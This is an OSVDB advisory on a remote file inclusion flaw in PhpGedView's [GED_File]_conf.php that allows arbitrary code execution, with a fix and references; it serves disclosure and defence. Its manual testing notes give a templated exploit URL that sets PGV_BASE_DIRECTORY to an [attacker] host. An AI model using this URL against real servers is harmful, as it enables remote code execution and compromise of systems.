PhpGedView PGV_BASE_DIRECTORY Arbitrary Command Execution

2004-01-29T05:36:45
ID OSVDB:3769
Type osvdb
Reporter OSVDB
Modified 2004-01-29T05:36:45

Description

Vulnerability Description

PhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Upgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PhpGedView contains a flaw that may allow a malicious user to execute arbitrary code. The issue is triggered because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. It is possible that the flaw may allow an attacker to execute arbitrary code resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

In this case you have to obtain the name of the GEDCOM File used. Just perform a http://[target]/session.php request the GEDCOM file will be in argument of the login.php call.

http://[victim]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://[attacker]&THEME_DIR=/

References:

Vendor URL: http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517 Vendor URL: http://phpgedview.sourceforge.net/ Secunia Advisory ID:10753 Related OSVDB ID: 3768 Other Advisory URL: http://www.netvigilance.com/advisory0002 Other Advisory URL: http://www.securityfocus.com/archive/1/352355 Keyword: TC 17868 Keyword: netVigilance Security Advisory 2 CVE-2004-0128 Bugtraq ID: 9531